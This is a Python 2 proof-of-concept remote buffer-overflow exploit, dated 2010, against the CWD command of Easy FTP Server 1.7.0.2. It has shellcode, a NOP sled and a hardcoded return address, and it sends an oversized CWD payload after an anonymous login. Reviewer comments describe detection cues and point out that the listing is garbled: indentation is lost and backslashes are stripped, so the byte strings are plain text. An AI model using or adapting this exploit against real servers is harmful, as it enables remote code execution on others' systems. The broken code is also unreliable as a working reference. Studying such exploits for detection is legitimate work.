# Title : Easy FTP Server v1.7.0.2 CWD Remote BoF
# Published : 2010-02-22
# Author : athleet
# Tested on: XP SP3 (Eng)
#!/usr/bin/python
# Python 2 proof-of-concept (print statements without parentheses) for the
# Easy FTP Server 1.7.0.2 CWD overflow named in the header. Kept for
# analysis and detection context: the only FTP traffic it produces is an
# anonymous login followed by a single, oversized CWD command.
import socket, sys
print """
*************************************************
* Easy FTP Server 1.7.0.2 Remote BoF *
* Discovered by: athleet *
* jonbutler88[at]googlemail[dot]com *
*************************************************
"""
# Exactly two positional arguments are required: target host and port.
# NOTE(review): the statements under this `if` are not indented as printed;
# the listing appears to have lost its indentation during extraction.
if len(sys.argv) != 3:
print "Usage: ./easyftp.py <Target IP> <Port>"
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
# Calc.exe PoC shellcode - Tested on XP Pro SP3 (Eng)
#
# B *0X009AFE44
#
# NOTE(review): as printed, these literals are plain ASCII letters and
# digits, not byte escapes -- the backslashes appear to have been dropped
# by extraction, so len(shellcode) here differs from the author's original.
# The addresses in the side comments are fixed to one OS build (XP SP3
# English, per the header), which is why the PoC is build-specific.
shellcode = (
"xbax20xf0xfdx7f" # MOV EDX,7FFDF020
"xc7x02x4cxaaxf8x77" # MOV DWORD PTR DS:[EDX],77F8AA4C
"x33xC0" # XOR EAX,EAX
"x50" # PUSH EAX
"x68x63x61x6Cx63" # PUSH 636C6163
"x54" # PUSH ESP
"x5B" # POP EBX
"x50" # PUSH EAX
"x53" # PUSH EBX
"xB9xC7x93xC2x77" # MOV ECX,77C293C7
"xFFxD1" # CALL ECX
"xEBxF7" # JMP SHORT 009AFE5B
)
# Padding brings nopsled + shellcode to 268 bytes; the 4-byte `ret` follows.
nopsled = "x90" * (268 - len(shellcode))
ret = "x58xFDx9Ax00"
# Detection note: a 272-byte CWD argument is far beyond any legitimate path
# length -- FTP proxies/IDS rules that bound argument length, or server logs
# showing an abnormally long CWD, flag this traffic directly.
payload = nopsled + shellcode + ret # 272 bytes
print "[+] Launching exploit against " + target + "..."
# No settimeout() is set on the socket, so every recv() below can block
# indefinitely if the peer stops responding.
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect((target, port))
print "[+] Connected!"
except:
# Bare except: also swallows KeyboardInterrupt/SystemExit; maintained
# code would catch socket.error here. `connect` is assigned but never used.
print "[!] Connection failed!"
sys.exit(0)
# Banner, then anonymous USER/PASS; each recv() discards the reply.
# NOTE(review): the 'rn' suffixes are presumably '\r\n' CRLF terminators
# with the backslashes lost in extraction, like the byte strings above.
s.recv(1024)
s.send('USER anonymousrn')
s.recv(1024)
s.send('PASS anonymousrn')
s.recv(1024)
# Send payload...
print "[+] Sending payload..."
s.send('CWD ' + payload + 'rn')
# Crude success check: a recv() that raises (connection dropped) is read as
# the server having crashed; a normal reply is read as failure. A server that
# neither replies nor closes the connection makes this hang (no timeout).
try:
s.recv(1024)
print "[!] Exploit failed..."
except:
print "[+] Exploited ^_^"